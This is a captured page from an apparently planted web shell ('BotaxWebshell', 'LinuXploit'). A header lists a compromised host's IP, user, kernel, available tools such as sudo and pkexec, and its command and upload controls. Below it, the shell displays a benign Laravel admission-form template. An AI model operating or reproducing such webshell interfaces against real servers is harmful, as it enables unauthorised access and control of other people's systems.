BotaxWebshell
Server IP : 68.178.172.28  /  Your IP : 216.73.216.26
Web Server : Apache
System : Linux 28.172.178.68.host.secureserver.net 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
User : kiskarnal ( 1003)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /home/kiskarnal/public_html/resources/views/front/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/kiskarnal/public_html/resources/views/front/testing-form.blade.php
<!-- ======= Header include ========= -->
@include('front.includes.header')
<!-- ======= Header include ========= -->

<style>
    
.gender-form>.form-check {
    justify-content: normal !important;
    width: fit-content;
    cursor: pointer;
}

.gender-form {
    display: flex;
    align-items: center;
    gap: 20px;
}
    
</style>

<body class="home page-template-default page page-id-2039 gdlr-core-body woocommerce-no-js tribe-no-js kingster-body kingster-body-front kingster-full  kingster-with-sticky-navigation  kingster-blockquote-style-1 gdlr-core-link-to-lightbox">

                
                <div class="addmision-form-area">
                 
                    <div class="container my-4 py-5">
                        
                        <div class="row align-item-center">
                            
                            <div class="col-lg-7 col-xs-12 col-sm-12">
                                
                                <div class="admission-image">
                                    <!--<img src="./assets/images/admission-form-poster.jpg" class="img-fluid" alt=""  />-->
                                </div>
                                
                            </div>
                            
                            <div class="col-lg-5 col-xs-12 col-sm-12">
                                
                            @if(session()->has('message'))
                                <div class="alert alert-success">
                                    {{ session()->get('message') }}
                                </div>
                            @endif
                            
                        <form class="registration-form" method="post" action="{{url('save-test-lead')}}" enctype="multipart/form-data" autocomplete="off">
                            @csrf
                            <input type="hidden" name="edit_id" value="">
                            <div class="row">
                                <div class="col-md-12 col-xs-12 col-sm-12">
                                    
                                    <div class="addmission-form-title">
                                        <h4>Registration Form</h4>
                                        <h5>For Admission</h5>
                                    </div>
                                    
                                   
                                
                                    <div class="form-group">
                                        <label style="display:block;">Select Current Standard</label>
                                        <select class="form-control" name="grade" required>
                                            <option value="select_class">Select</option>
                                            <option value="6th Class">6th Class</option>
                                            <option value="7th Class">7th Class</option>
                                            <option value="8th Class">8th Class</option>
                                            <option value="9th Class">9th Class</option>
                                            <option value="10th Class">10th Class</option>
                                            <option value="11th Class">11th Class</option>
                                            <option value="12th Class">12th Class</option>
                                            
                                        </select>
                                    </div>
                                    
                                    <div class="form-group">
                                        <label>Phone Number</label>
                                        <input class="form-control" type="tel" name="phone" required placeholder="Enter Phone Number"  />
                                    </div>
                                  
                                    <div class="form-group">
                                        <label style="display:block;">Email</label>
                                        <input class="form-control" type="email" name="email" required placeholder="example@gmail.com" autocomplete="off" />
                                    </div>
                                   
                                    <button class="btn btn-success btn-block my-3 py-2 float-right" type="submit"
                                        style="
                                            font-size: 18px;
                                            font-weight: bold;
                                            letter-spacing: 0.5px;
                                            text-transform: uppercase;
                                        "
                                    >
                                        Yes! I want to Enroll
                                    </button>
                                    
                                </div>
                                
                            </div>    
        
                        </form>
                        
                            </div>
                        </div>
                        
                    </div>
                
                </div>

            <!-- ======= Footer include ========= -->
                @include('front.includes.footer')
            <!-- ======= Footer include ========= -->

<script>
    
    $(document).ready(function(){

var current_fs, next_fs, previous_fs; //fieldsets
var opacity;

$(".next").on("click", function() {
    $("body").scrollTop(0);
});

$(".next").click(function(){

current_fs = $(this).parent();
next_fs = $(this).parent().next();

//Add Class Active
$("#progressbar li").eq($("fieldset").index(next_fs)).addClass("active");

//show the next fieldset
next_fs.show();
//hide the current fieldset with style
current_fs.animate({opacity: 0}, {
step: function(now) {
// for making fielset appear animation
opacity = 1 - now;

current_fs.css({
'display': 'none',
'position': 'relative'
});
next_fs.css({'opacity': opacity});
},
duration: 600
});
});

$(".previous").click(function(){

current_fs = $(this).parent();
previous_fs = $(this).parent().prev();

//Remove class active
$("#progressbar li").eq($("fieldset").index(current_fs)).removeClass("active");

//show the previous fieldset
previous_fs.show();

//hide the current fieldset with style
current_fs.animate({opacity: 0}, {
step: function(now) {
// for making fielset appear animation
opacity = 1 - now;

current_fs.css({
'display': 'none',
'position': 'relative'
});
previous_fs.css({'opacity': opacity});
},
duration: 600
});
});

$('.radio-group .radio').click(function(){
$(this).parent().find('.radio').removeClass('selected');
$(this).addClass('selected');
});

$(".submit").click(function(){
return false;
})

});


$(document).ready(function(){
    $('#leads').change(function(){
         if($(this).val()=='employee'){
             $('#empName').show();
         }else{
             $('#empName').hide();
         }
    });
    
     $('body').on('change','#country',function(){
         
         let id =  $('option:selected', this).attr('id');
        
          $.ajax({
              
              url: "{{url('get-state')}}",
              dataType:"html",
              data:{
                  country_id:id
              },
              success: function(result){
                  $('#state').html('');
                $('#state').html("<option value=''>Select State</option>");
                $('#state').append(result);
              }
          });
        });
        
       $('body').on('change','#state',function(){
         
         let id =  $('option:selected', this).attr('id');
        
          $.ajax({
              
              url: "{{url('get-city')}}",
              dataType:"html",
              data:{
                  state_id:id
              },
              success: function(result){
                  $('#city').html('');
                $('#city').html("<option value=''>Select State</option>");
                $('#city').append(result);
              }
          });
        }); 
});
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit